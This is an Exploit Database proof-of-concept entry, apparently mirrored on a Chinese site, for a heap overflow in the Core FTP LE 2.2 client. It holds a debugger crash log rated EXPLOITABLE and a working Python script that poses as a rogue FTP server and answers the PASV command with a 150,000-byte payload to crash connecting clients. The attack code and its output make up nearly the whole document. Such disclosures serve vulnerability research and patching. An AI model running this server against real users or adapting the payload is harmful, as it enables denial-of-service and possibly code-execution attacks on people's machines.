Core FTP LE 2.2 – Heap Overflow (PoC)

• Exploit Database
• 15 阅读

• 作者： Gabor Seljan
  日期： 2014-06-11
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33713/

• #-----------------------------------------------------------------------------#
  # Exploit Title: Core FTP LE 2.2 - Heap Overflow PoC#
  # Date: Jun 11 2014 #
  # Exploit Author: Gabor Seljan#
  # Software Link: http://www.coreftp.com/#
  # Version: 2.2 build 1798 #
  # Tested on: Windows XP SP3 #
  #-----------------------------------------------------------------------------#
  
  # In some cases the client does not do proper bounds checking on server
  # responses. An overly long reply from the server causes a heap overflow and
  # crashes the application. The USER, PASS, PASV, SYST, PWD, CDUP commands are
  # all vulnerable and possibly other commands are too.
  
  '''
  HEAP[coreftp.exe]: Heap block at 00F17BC8 modified at 00F1BBD1 past requested size of 4001
  (9d8.9f4): Break instruction exception - code 80000003 (first chance)
  eax=00f17bc8 ebx=00f1bbd1 ecx=7c91eab5 edx=015295ab esi=00f17bc8 edi=00004001
  eip=7c90120e esp=015297ac ebp=015297b0 iopl=0 nv up ei pl nz na po nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202
  ntdll!DbgBreakPoint:
  7c90120e ccint 3
  0:002> dd eax
  00f17bc8004b0804 011f0733 20373232 41414141
  00f17bd841414141 41414141 41414141 41414141
  00f17be841414141 41414141 41414141 41414141
  00f17bf841414141 41414141 41414141 41414141
  00f17c0841414141 41414141 41414141 41414141
  00f17c1841414141 41414141 41414141 41414141
  00f17c2841414141 41414141 41414141 41414141
  00f17c3841414141 41414141 41414141 41414141
  0:002> g
  HEAP[coreftp.exe]: Invalid Address specified to RtlFreeHeap( 00C10000, 00F17BD0 )
  (9d8.9f4): Break instruction exception - code 80000003 (first chance)
  eax=00f17bc8 ebx=00f17bc8 ecx=7c91eab5 edx=015295ba esi=00c10000 edi=00f17bc8
  eip=7c90120e esp=015297c4 ebp=015297c8 iopl=0 nv up ei pl nz na po nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202
  ntdll!DbgBreakPoint:
  7c90120e ccint 3
  0:002> g
  (9d8.9f4): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00f3bff0 ebx=00000000 ecx=41414141 edx=00f1bbf0 esi=00f3bfe8 edi=00c10000
  eip=7c9276dc esp=01529704 ebp=015297d8 iopl=0 nv up ei pl zr na pe nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246
  ntdll!RtlOemStringToUnicodeString+0x277:
  7c9276dc 8901mov dword ptr [ecx],eaxds:0023:41414141=????????
  0:002> !exploitable
  Exploitability Classification: EXPLOITABLE
  Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlOemStringToUnicodeString+0x0000000000000277 (Hash=0x72683756.0x417d7f55)
  
  User mode write access violations that are not near NULL are exploitable.
  (b58.cf0): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00f1bbf0 ebx=41414141 ecx=00004141 edx=00c10608 esi=00f1bbe8 edi=41414141
  eip=7c919064 esp=0152d30c ebp=0152d528 iopl=0 nv up ei pl nz ac po nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010212
  ntdll!RtlDosSearchPath_Ustr+0x473:
  7c919064 8b0bmov ecx,dword ptr [ebx]ds:0023:41414141=????????
  0:002> dd eax
  00f1bbf041414141 41414141 41414141 41414141
  00f1bc0041414141 41414141 41414141 41414141
  00f1bc1041414141 41414141 41414141 41414141
  00f1bc2041414141 41414141 41414141 41414141
  00f1bc3041414141 41414141 41414141 41414141
  00f1bc4041414141 41414141 41414141 41414141
  00f1bc5041414141 41414141 41414141 41414141
  00f1bc6041414141 41414141 41414141 41414141
  0:002> dd esi
  00f1bbe841414141 41414141 41414141 41414141
  00f1bbf841414141 41414141 41414141 41414141
  00f1bc0841414141 41414141 41414141 41414141
  00f1bc1841414141 41414141 41414141 41414141
  00f1bc2841414141 41414141 41414141 41414141
  00f1bc3841414141 41414141 41414141 41414141
  00f1bc4841414141 41414141 41414141 41414141
  00f1bc5841414141 41414141 41414141 41414141
  '''
  
  #!/usr/bin/python
  
  from socket import *
  
  host = "0.0.0.0"
  port = 21
  payload = "A" * 150000
  
  s = socket(AF_INET, SOCK_STREAM)
  s.bind((host, 21))
  s.listen(1)
  
  print "[+] Evil FTP Server started"
  print "[+] Listening on port %d..." % port
  
  conn, addr = s.accept()
  print "[+] Connection accepted from %s" % addr[0]
  conn.send("220 Welcome to Evil FTP Server\r\n")
  conn.recv(1024)# Receive USER
  conn.send("331 Need password for whatever user\r\n")
  conn.recv(1024)# Receive PASS
  conn.send("230 User logged in\r\n")
  conn.recv(1024)# Receive SYST
  conn.send("215 UNIX Type: L8\r\n")
  conn.recv(1024)# Receive PWD
  conn.send("257 \"/\" is current directory\r\n")
  
  try:
  print "[+] Sending evil response for 'PASV' command..."
  conn.recv(1024)# Receive PASV
  conn.send("227 "+payload+"\r\n")
  conn.recv(1024)
  except error as e:
  if e.errno == 10054:
  print "[+] Client crashed!"
  else:
  print e
  finally:
  conn.close()
  s.close()